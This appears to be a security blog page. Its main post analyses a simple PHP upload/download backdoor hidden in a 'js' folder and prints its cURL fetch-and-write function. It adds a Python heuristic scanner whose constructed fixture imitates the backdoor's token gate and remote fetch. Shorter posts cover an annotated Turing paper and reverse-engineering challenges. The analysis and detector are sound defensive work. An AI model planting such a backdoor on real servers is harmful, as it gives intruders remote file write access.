SAMPLE 28092020-1 : Ogretmenevi

Found: 28/09/2020

Working name: Ogretmenevi

Files

http://[REDACTED]/ogretmenevi/js/bootstrap.php

Description

  • Seems to be a very simple file upload script
  • No obfuscation at all
  • It hides itself by these mechanisms:
    • In order to access the functionality you need to know a random string that is passed with every request as a GET parameter.
    • Sets error_reporting to level 0.
    • It is installed/copied under a folder called “js” in an attempt to stay under the radar.
  • The person who installed this malware renamed the directory's index.html to index.php without changing its content at all, perhaps to check whether the server supported PHP before uploading the file.
  • Ogretmenevi is a place in Turkey. A Google search turns up more instances of this malware using the same folder name, which indicates that the string is fixed rather than random and points to a likely Turkish origin of the malware.

Tested Functionality

  • File upload via included form
  • File download (?)
    • In order to download a file, it first tries cURL, which means it gets what a browser would see (the rendered response body) or, in most cases, nothing at all. If the cURL request fails, it falls back to file_get_contents, which behaves the same way, since it is passed a URL in both cases.
function get($site, $dir) {
    // First attempt: fetch $site over HTTP with cURL (this returns the served response, not the file on disk)
    $getf = curl_init();
    curl_setopt($getf, CURLOPT_URL, $site);
    curl_setopt($getf, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($getf, CURLOPT_TIMEOUT, 10);
    $data = curl_exec($getf);
    // Fallback: file_get_contents on the same URL, with errors suppressed by @
    if (!$data) {
        $data = @file_get_contents($site);
    }
    // Whatever came back (possibly an empty string) is written to the local path $dir
    file_put_contents($dir, $data);
}
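The description and the tested functionality above list several traits that are easy to turn into a triage check: a PHP file sitting in an asset folder like “js”, error_reporting set to 0, a GET-parameter token gate, upload handling, and a fetch-then-write pattern. The following scanner is an added example, not code from the sample or from this blog; the indicator set, the asset-directory list, the threshold and the sample file tree are all my own constructions, and the indicator regexes are heuristics rather than anything derived from the real file beyond what the note describes.

```python
import re
from pathlib import PurePosixPath

# Directories that normally hold only static assets; a PHP file under one of
# them is itself a signal (the sample sat in a folder named "js").
# This list is an assumption, adjust it to the web root being reviewed.
ASSET_DIRS = {"js", "css", "img", "images", "fonts"}

# Source-level indicators matching the traits described in the note. Each one
# alone is common in legitimate code; the combination is what earns a look.
INDICATORS = {
    "silences_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "get_token_gate": re.compile(r"\$_GET\s*\[[^\]]+\]\s*(?:!==?|===?)\s*['\"]"),
    "handles_upload": re.compile(r"move_uploaded_file\s*\(|\$_FILES\s*\["),
    "remote_fetch": re.compile(r"curl_exec\s*\(|file_get_contents\s*\(\s*\$"),
    "writes_file": re.compile(r"file_put_contents\s*\("),
}


def score_file(path: str, content: str) -> list[str]:
    """Return the names of the indicators that fire for one file."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    parts = PurePosixPath(path).parts
    is_php = path.lower().endswith(".php")
    if is_php and any(p in ASSET_DIRS for p in parts[:-1]):
        hits.append("php_in_asset_dir")
    # A .php file with no PHP open tag at all, like the renamed index.html.
    if is_php and "<?" not in content:
        hits.append("php_without_php_code")
    return hits


def triage(files: dict[str, str], threshold: int = 2) -> dict[str, list[str]]:
    """Return the files whose indicator count reaches the threshold, with their hits."""
    findings = {}
    for path, content in files.items():
        hits = score_file(path, content)
        if len(hits) >= threshold:
            findings[path] = hits
    return findings


# Constructed sample tree (not the real files from the incident). The first
# two entries imitate the layout described in the note; the others are benign.
SAMPLE_FILES = {
    "ogretmenevi/js/bootstrap.php": (
        "<?php\n"
        "error_reporting(0);\n"
        "if ($_GET['k'] != 'x1y2z3') exit;\n"
        "if (isset($_FILES['f'])) { /* upload handling elided */ }\n"
        "if (isset($_GET['u'])) { $c = curl_init($_GET['u']); $d = curl_exec($c); file_put_contents($dir, $d); }\n"
        "?><form method=post enctype=multipart/form-data><input type=file name=f></form>\n"
    ),
    "ogretmenevi/js/index.php": "<html><body><h1>Index of /js</h1></body></html>\n",
    "js/app.js": "document.addEventListener('DOMContentLoaded', () => {});\n",
    "index.php": "<?php\nerror_reporting(E_ALL);\necho 'hello';\n",
}

if __name__ == "__main__":
    for path, hits in triage(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(hits)}")
```

Run against a real web root, the dictionary would be filled by walking the tree and reading each file; the threshold is deliberately low so that the renamed index.html (which contains no PHP at all) is still surfaced alongside the upload script, since that oddity was one of the clues in this sample.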

Thoughts

  • Very amateur effort, especially the download part.
  • Use of very old HTML tags… like “font” (WTF?)

“Computing Machinery and Intelligence” by Alan M. Turing, annotated.

In this influential paper, published in October 1950, Turing addresses the question “can machines think?” and develops concepts like the Imitation Game and the Turing Machine, of crucial importance to the development of theoretical computer science, even anticipating problems that AI is facing today.

As promised, I am releasing my notes on the paper, hoping they help you.

You can download the annotated PDF here.

Crackme 1: Get The Password by HN1

Download URL: https://crackmes.one/crackme/5c9126c033c5d46ecd37c8f4

This crackme is a regular, non-packed PE executable, suitable as a starting point for people interested in the art of reverse engineering. It is a console application. After opening IDA to start the analysis, we can easily see that this program was written in assembly, as the structure is really straightforward.


Challenge 2

In the second installment of this reverse engineering series I present you with a new challenge. This time you are a secret agent on a very important mission. Some documents are stored in a locked safe that you have to open. There are some weird symbols and some green bars that oscillate up and down. Your intuition tells you that the safe will open when the three bars are full!

Now you start to think… this is the way, but how am I gonna make it happen?

If you decide to go and solve this challenge, please tell me how you did it by email (david@studiosi.es) and I will collect the solutions in a future post. Even better, do a write-up, post it somewhere online and I will link to it here!

Hint

Time flies

Download it and have fun!